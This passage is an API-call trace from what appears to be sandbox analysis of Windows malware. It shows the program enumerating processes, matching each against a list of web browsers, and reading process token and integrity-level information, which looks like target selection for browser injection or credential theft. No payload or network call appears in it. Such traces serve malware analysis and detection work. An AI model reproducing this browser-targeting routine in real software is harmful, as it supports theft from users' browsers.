IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.734] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.734] CloseHandle (hObject=0x590) returned 1 [0222.734] CloseHandle (hObject=0x584) returned 1 [0222.734] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0222.734] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0222.734] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0222.734] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0222.734] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0222.734] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0222.734] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x584 [0222.734] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.734] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.734] GetLastError () returned 0x7a [0222.734] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.734] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.734] CloseHandle (hObject=0x590) returned 1 [0222.735] CloseHandle (hObject=0x584) returned 1 [0222.735] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x584 [0222.735] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e5d88, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.735] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.735] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.735] GetLastError () returned 0x7a [0222.735] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.735] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.735] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.735] CloseHandle (hObject=0x590) returned 1 [0222.735] CloseHandle (hObject=0x584) returned 1 [0222.735] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0222.735] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0222.735] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0222.735] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0222.735] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0222.735] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0222.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x584 [0222.735] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.735] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.735] GetLastError () returned 0x7a [0222.735] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.735] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.735] CloseHandle (hObject=0x590) returned 1 [0222.735] CloseHandle (hObject=0x584) returned 1 [0222.735] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.735] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x584 [0222.735] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e5f20, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.735] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.735] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.735] GetLastError () returned 0x7a [0222.735] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.735] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.735] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.735] CloseHandle (hObject=0x590) returned 1 [0222.735] CloseHandle (hObject=0x584) returned 1 [0222.736] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0222.736] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0222.736] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0222.736] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0222.736] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0222.736] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0222.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0222.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0222.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x584 [0222.736] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.736] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.736] GetLastError () returned 0x7a [0222.736] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.736] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.736] CloseHandle (hObject=0x590) returned 1 [0222.736] CloseHandle (hObject=0x584) returned 1 [0222.736] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x584 [0222.736] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e6568, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.736] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.736] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.736] GetLastError () returned 0x7a [0222.736] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.736] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.736] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.736] CloseHandle (hObject=0x590) returned 1 [0222.736] CloseHandle (hObject=0x584) returned 1 [0222.736] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0222.736] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0222.736] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0222.736] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0222.736] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0222.736] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0222.736] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x584 [0222.736] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.736] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.736] GetLastError () returned 0x7a [0222.736] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.736] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.736] CloseHandle (hObject=0x590) returned 1 [0222.736] CloseHandle (hObject=0x584) returned 1 [0222.737] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x584 [0222.737] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e6a60, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.737] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.737] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.737] GetLastError () returned 0x7a [0222.737] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.737] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.737] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.737] CloseHandle (hObject=0x590) returned 1 [0222.737] CloseHandle (hObject=0x584) returned 1 [0222.737] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0222.737] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0222.737] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0222.737] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0222.737] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0222.737] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0222.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x584 [0222.737] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.737] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.737] GetLastError () returned 0x7a [0222.737] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.737] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.737] CloseHandle (hObject=0x590) returned 1 [0222.737] CloseHandle (hObject=0x584) returned 1 [0222.737] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.737] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x584 [0222.737] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e6b78, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.737] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.737] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.737] GetLastError () returned 0x7a [0222.737] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.737] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.737] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.737] CloseHandle (hObject=0x590) returned 1 [0222.737] CloseHandle (hObject=0x584) returned 1 [0222.737] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0222.737] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0222.738] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0222.738] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0222.738] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0222.738] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0222.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x584 [0222.738] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.738] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.738] GetLastError () returned 0x7a [0222.738] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.738] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.738] CloseHandle (hObject=0x590) returned 1 [0222.738] CloseHandle (hObject=0x584) returned 1 [0222.738] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x584 [0222.738] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e6c90, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.738] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.738] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.738] GetLastError () returned 0x7a [0222.738] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.738] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.738] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.738] CloseHandle (hObject=0x590) returned 1 [0222.738] CloseHandle (hObject=0x584) returned 1 [0222.738] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0222.738] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0222.738] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0222.738] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0222.738] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0222.738] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0222.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x584 [0222.738] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.738] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.738] GetLastError () returned 0x7a [0222.738] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0222.738] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0222.738] CloseHandle (hObject=0x590) returned 1 [0222.738] CloseHandle (hObject=0x584) returned 1 [0222.738] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0222.738] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x584 [0222.738] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2e6dd0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0222.739] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x590) returned 1 [0222.739] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0222.739] GetLastError () returned 0x7a [0222.739] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0222.739] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0222.739] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0222.739] CloseHandle (hObject=0x590) returned 1 [0222.739] CloseHandle (hObject=0x584) returned 1 [0222.739] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0222.739] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0222.739] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0222.739] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0222.739] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0222.739] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0222.739] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x584 [0222.739] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x590) returned 1 [0222.739] GetTokenInformation (in: TokenHandle=0x590, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0222.739] GetLastError () returned 0x7a 